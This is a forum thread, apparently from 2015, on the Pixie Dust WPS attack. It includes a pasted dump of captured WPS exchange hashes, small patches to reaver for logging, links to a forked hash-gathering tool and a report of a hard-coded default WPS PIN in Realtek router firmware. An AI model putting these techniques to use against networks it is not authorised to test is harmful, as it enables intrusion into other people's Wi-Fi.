e2:4b:6c:da:3b:c9:9c:0a:1f:97:52:69:d4:55:2a:5e:85:fb:35:bd:f8:d1:47:a3:d3:53:5e:28:b8:ca:74:8f:0c:c2:8d:4c:18:f8:52:16:54:ee:da:bf:1d:c3:c4:15:a4:0d:24:96:a9:95:b2:28:d7:ec:a2:87:f8:b4:70:24:fc:aa:c7:33:bb:fd:b2:e8:ef:7a:df:07:70:d6:df:2c:8b:dd:d1:3b:f7:fa:1d:cc:53:35:a4:99:d8:77:41:dd:2e:7e:c4:2a:37:4d:6d:59:90:f5:ed:30:d7:93:82:cf:22:2b:9d:95:08:3d:cc:bf:cd:78:99:66:ac:a8:81:7f:32:33:63:ae:b6:16:f1:d4:e1:10:3f:08:64:f8:86:72:da:c6:97:53:f0:c7:07:c4:0e:2c:c7:48:30:cc:0b:f0:ba:27:8d:5c:39:4d:68:cd:3c:b3:19:13:03:7a:be:4d:b1:19:bd:f0:83:f8:40:88:82:c9:ee:94:7a:43:8d:2f [P] PKR: 15:e1:31:80:df:2b:44:9a:9a:21:58:00:42:75:e9:22:23:ea:96:66:04:e0:0c:12:96:20:a4:51:55:59:2f:ac:ad:bf:e5:c6:60:30:3e:fd:fa:62:b0:cd:f9:26:e7:2a:c7:69:80:97:ce:f0:ec:6d:03:bb:c5:d2:44:f1:d4:bd:88:be:8f:e2:e7:69:42:10:21:9d:8d:da:d6:d9:58:c7:48:8c:80:4c:25:76:c4:d8:5b:6d:25:8d:d1:1e:08:ab:10:2b:c0:73:af:7e:a6:c0:0f:8c:4c:61:54:8f:11:fc:18:51:e5:af:62:c8:19:12:2e:6e:84:0f:35:ad:9b:d6:21:f7:31:f1:00:6e:55:df:5b:ac:67:cd:1a:36:7c:14:de:f6:e1:01:14:d1:e5:88:78:6c:9a:7a:0e:24:bb:b1:82:97:c9:06:1b:66:7f:50:41:d6:e6:80:e3:28:a7:b9:47:1b:1e:cf:0b:92:da:f8:50:92:94:de:fa:2e:6c:82 [P] AuthKey: 68:4a:a0:f1:48:81:32:6a:ec:22:e7:2d:4a:ff:4c:97:42:6c:f4:5c:1c:78:2f:05:73:bd:d4:e3:eb:9b:3a:e4 [P] E-Hash1: 2e:dc:77:bf:39:09:1a:44:a4:1d:45:28:12:64:c1:7d:ca:9e:f4:40:89:44:05:14:10:32:dc:b5:f7:73:24:c3 [P] E-Hash2: 26:4f:77:c9:c9:3e:34:a3:80:c4:07:b8:83:2a:66:a2:51:04:cd:e6:0f:6a:97:7a:4f:21:37:81:51:04:1e:1f
1. Which is the best tool for automated hash collection. Something we could use to gather hashes to send off for analysis, possibly find new holes for pixiewps.
2. Are hashes from locked routers, corrupt - no good 4 analysis?
3. Also any update on Realtek attack?
1.
The best way is simply to save a *.cap file with the PROBES and M messages and to add a *.txt file with the output of modified reaver.
In the case that the chipset and/or the model-manufacturer doesn't appear fully/dirreclty in the probes/stdout of modified reaver, please add manualy this information
2.
They are not corrupted but you need to get m1-m2 and m3 and you will not get this full sequence on a locked router (until it is unlocked again).
3.
Do you know how to "disassemble" firmware? i am stuck and need some help, i found something very interesting on unsupported realteck in parts that can be disassembled easly with binwalk from craig heffner.
basically there is a little *.sh script on startup that generate 4 things ( or check if theses four things have been generated correctly and generate them if that not the case) and one of them is the default WPS PIN.
on this devices the PIN is permanent/unconfigurable
Help would be appreciated
Gonna take a look at wireshark, try and figure it out.The best way is simply to save a *.cap file with the PROBES and M messages
kcdtv, appreciate the responses -very interesting.
Hope someone is developing a tool to automate the process, for noobs. If made easy for noobs like me, we can help build the data collection pool.
i use a modified reaver-src. if i set the -o $logfile switch, reaver writes only the pixie-data in the logfile:
For AuthKey make the following changes:
change :
to :Code:wps_common.c: printf("[P] AuthKey: ");
and add a new line in wps_common.c (under #include "wps_dev_attr.h) with:Code:wps_common.c: cprintf(VERBOSE, "[P] AuthKey: ");
And for Messages, you don't need (Here the M1 received Msg):Code:#include "../misc.h"
replace:
with:Code:exchange.c: cprintf(VERBOSE, "[+] Received M1 message\n");
i'll search with grep for all reaver messages, and change everything, which is not important for the output-file.Code:exchange.c: printf("[+] Received M1 message\n");
Not the perfect way, but it works
Last edited by someone_else; 2015-04-26 at 15:21.
I do have a fork of autopixiewps i modified a while back that does hash collections, and then produces also a shell script. Ill update my fork in my github repo ( github user name: d8tahead ).
It saves generic reaver output of model info, collects hashes, and produces shell script for coresponding hashes with pixiewps And gives each segment an ID#.
edit:
The one in my repo is a little old, ill update it soon
will post asap
Edit #2:
i had strip out some things from the code, but it should still work fine
autopixie has been updated in my repo:
https://github.com/d8tahead/AutoPixieWps
and you will need the new reaver t6x fork ( i added addition of R-Nonce for future pixiewps ) :
https://github.com/t6x/reaver-wps-fork-t6x
for my fork of autopixiewps for the hash gathering, you will need to enable option #5 on the main menu before the wash scan ( pixiehash gathering mode ).
also please note that the logs will be saved as essid and bssid and the prefix of PixieHash in the executing directory!
so be sure to cd to whichever directory you would like the hashes to be saved if executing from a shell.
remember to make autopixiewps.py executable!
Last edited by datahead; 2015-04-27 at 05:41.
after last ur update reavet doesnt work pixiewps: invalid option -- 'm'
İSSUE : ??
I look all pixie test post in this title ... Some modems are invulnerable because manufacturer, wps model numbers are FALSE.!
Example :
Wps Manufacturer : TPLINK
WPs model nambur :1
Tplink uses Realtek and Atheros chipset...
True value :
Wps manufacturer : Atheros
wps model number : WR740..
Other example:
WpsManufakturer : Realtek semicondukter,
Wps Model number : EV-2006-07-27...
Not "EV-2006-07-27" model number , true value :RTL8671
Can someone please tell me how to make reaver delay between sending M1 and M2?
Dependencies
[code]
sudo apt-get install libssl-dev
sudo apt-get install libpcap-dev
sudo apt-get install libsqlite3-dev
Couldnt get the libssl-dev its forbidden in repository as kali is unable to update
im running latest live ver. but still can get the package.
pixie is unable to install without ssl.
help me......
What fixes, improvements will pixiewps 1.1 bring?
How did you get this PIN ?
I will try it later this week because I'm travelling right now.
Thank you.